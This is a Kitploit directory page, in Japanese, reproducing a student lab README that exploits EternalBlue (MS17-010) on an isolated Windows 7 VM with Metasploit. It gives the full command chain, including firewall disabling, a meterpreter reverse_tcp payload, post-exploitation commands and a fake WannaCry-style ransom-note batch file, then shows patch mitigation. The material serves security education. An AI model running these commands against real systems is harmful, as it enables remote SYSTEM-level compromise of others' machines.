Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
EternalBlue-Exploit-Demonstration-MS17-010 — 脆弱なWindows 7 VMに対してMetasploitを使用したCVE-2017-0144(EternalBlue)の悪用を実演するサイバーセキュリティラボ。Meterpreterを介してSYSTEMレベルのアクセスを達成します。完全な攻撃チェーン、ポストエクスプロイテーション、MS17-010パッチによる緩和策を含み、隔離された倫理的なラボ環境でテスト済み。 | Kitploit
ツール/GitHubGitHub/ichhyak22/eternalblue-exploit-demonstration-ms17-010
特権昇格ペイロード生成脆弱性分析エクスプロイトポストエクスプロイトマルウェア分析ペネトレーションテストコマンド&コントロール学習と教育

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
インシデントレスポンス
ラボと実践
GitHubichhyak22/eternalblue-exploit-demonstration-ms17-010

EternalBlue-Exploit-Demonstration-MS17-010

脆弱なWindows 7 VMに対してMetasploitを使用したCVE-2017-0144(EternalBlue)の悪用を実演するサイバーセキュリティラボ。Meterpreterを介してSYSTEMレベルのアクセスを達成します。完全な攻撃チェーン、ポストエクスプロイテーション、MS17-010パッチによる緩和策を含み、隔離された倫理的なラボ環境でテスト済み。

リポジトリを見る
3ヶ月前未レビュー

EternalBlue エクスプロイト実演 (MS17-010)

CVE-2017-0144 (EternalBlue) を Metasploit を使用して脆弱な Windows 7 システムに対して悪用し、Meterpreter 経由で SYSTEM レベルのアクセスを達成するサイバーセキュリティラボ。

このプロジェクトは、WannaCry 型ランサムウェア攻撃のシミュレーション(安全なデモ)も行い、MS17-010 セキュリティパッチによる緩和策を実演します。


モジュール情報

モジュール: CSCM828 セキュリティ脆弱性とペネトレーションテスト

学生:

  • Daniel Nicolas Rentapalli (2548048)
  • Ichhya Koirala (2607189)

大学: スウォンジー大学


リソースとダウンロード

  1. MS17-010 EternalBlue SMB リモート Windows カーネルプール破損
    https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

  2. KB4012212 (Windows 7 x64 セキュリティ更新プログラム)
    https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

  3. Kali Linux (仮想マシンのダウンロード)
    https://www.kali.org/get-kali/#kali-virtual-machines

  4. Windows 7 SP1 Home Premium English x64 (ISO)
    https://archive.org/details/windows-7-home-prem-english

  5. VMware Workstation Pro
    https://www.vmware.com/products/desktop-hyper


1. 概要

このラボでは以下を実演します:

  • SMB 脆弱性 (MS17-010) のリモート悪用
  • EternalBlue によるカーネルレベルのアクセス
  • Meterpreter セッションの確立
  • 攻撃後の手法
  • WannaCry 型ランサムウェアのシミュレーション(安全)
  • パッチ適用による緩和策

2. ラボ環境

要件

  • VMware Workstation / VirtualBox
  • 最小 8GB RAM

攻撃者マシン

  • Kali Linux
  • Metasploit Framework

被害者マシン

  • Windows 7 SP1 x64 (パッチ未適用)

ネットワーク

  • ホストオンリー / NAT(隔離環境)
  • 両マシンが通信できることを確認

⚠️ このラボは完全に隔離された環境で実施する必要があります。


3. 被害者側のセットアップ (Windows 7)

管理者コマンドプロンプトで実行:

ファイアウォールを無効化

root@kitploit:~
netsh advfirewall set allprofiles state off

SMB ポートを確認

root@kitploit:~
netstat -an | findstr :445

更新プログラムを無効化(ラボの安定性のため)

root@kitploit:~
sc stop wuauserv
sc config wuauserv start= disabled

4. 攻撃者側のセットアップ (Kali Linux)

接続性を確認

root@kitploit:~
ping <victim-ip>
nmap -p 445 <victim-ip>

5. エクスプロイト手順

ステップ 1: ターゲットをスキャン

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

期待される結果:

  • ホストは VULNERABLE と表示される

ステップ 2: エクスプロイトを実行

root@kitploit:~
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <victim-ip>
set LHOST <attacker-ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

ステップ 3: アクセスを確認

root@kitploit:~
meterpreter > getuid

期待される結果:

root@kitploit:~
NT AUTHORITY\SYSTEM

6. 攻撃後の操作

root@kitploit:~
sysinfo
getuid
ps
screenshot
shell
whoami
ipconfig

安定したプロセス移行

root@kitploit:~
ps
migrate <explorer.exe PID>

7. WannaCry シミュレーション(安全なデモ)

ペイロードを作成 (Kali)

root@kitploit:~
cat > /tmp/wannacry64.bat << 'EOF'
@echo off
title WannaCryptor Demo - SAFE SIMULATION
color 0a
mode con: cols=80 lines=25
cls

setlocal enabledelayedexpansion

set id=%random%-%random%-%random%
set /a timeleft=60

:main
cls
echo ========================================================
echo           WANNA DECRYPTOR 0.4 x64 (DEMO)
echo ========================================================
echo.
echo  All files have been encrypted!
echo.
echo  Send 0.25 BTC to:
echo  13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
echo.
echo  Personal ID: %id%
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

echo Initializing encryption...
timeout /t 2 >nul

for /l %%i in (1,1,20) do (
    set /a percent=%%i*5
    call :progress !percent!
    timeout /t 1 >nul
)

goto countdown

:progress
set bar=
set /a blocks=%1/5
for /l %%b in (1,1,!blocks!) do set bar=!bar!#
cls
echo ========================================================
echo           ENCRYPTING FILES...
echo ========================================================
echo.
echo Progress: [%bar%] %1%%
echo.

set /a randfile=%random% %% 5
if !randfile!==0 echo Encrypting: documents.docx
if !randfile!==1 echo Encrypting: photos.jpg
if !randfile!==2 echo Encrypting: database.sql
if !randfile!==3 echo Encrypting: backup.zip
if !randfile!==4 echo Encrypting: project.pptx

exit /b

:countdown
cls

:loop
cls
echo ========================================================
echo           YOUR FILES ARE ENCRYPTED
echo ========================================================
echo.
echo  Pay within the time limit or files will be lost!
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

if !timeleft! LEQ 0 goto end

set /a timeleft-=1
timeout /t 1 >nul
goto loop

:end
cls
echo ========================================================
echo              TIME EXPIRED
echo ========================================================
echo.
echo  Your files are permanently locked.
echo.
echo  (This was a SAFE DEMO simulation)
echo.
echo ========================================================
pause
EOF

アップロードと実行

root@kitploit:~
meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"

8. 緩和策(パッチ適用の実演)

ステップ 1: パッチをダウンロード

  • アクセス: https://www.catalog.update.microsoft.com/
  • 検索: KB4012212 Windows 7 x64
  • .msu ファイルをダウンロード

ステップ 2: パッチをインストール

root@kitploit:~
wusa.exe KB4012212-x64.msu /quiet /norestart

ステップ 3: 再起動

root@kitploit:~
shutdown /r /t 0

ステップ 4: パッチを確認

root@kitploit:~
systeminfo | findstr KB4012212

ステップ 5: エクスプロイトを再実行

期待される結果:

  • エクスプロイトは失敗する
  • Meterpreter セッションは確立されない

ステップ 6: Nmap で確認

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

期待される結果:

  • NOT VULNERABLE と表示される

9. トラブルシューティング

問題解決策
エクスプロイトが失敗する接続性を確認
セッションが確立されないファイアウォールを無効化
セッションが切断されるエクスプロイトを再試行
ウィンドウが表示されないexplorer.exe に移行

10. 倫理的考慮事項

このプロジェクトは以下に基づき実施されます:

  • 管理されたラボ用マシンのみで実施
  • 完全に隔離されたネットワーク内で実施
  • 教育目的のみで実施

許可のない使用は以下に違反します:

  • 英国コンピュータ不正使用法 1990 年

11. 結論

このラボでは以下を実演します:

  • EternalBlue を使用した実世界の SMB エクスプロイト
  • Windows 7 の SYSTEM レベルの侵害
  • ランサムウェア攻撃のシミュレーション(安全)
  • タイムリーなパッチ適用の重要性
ツールをダウンロード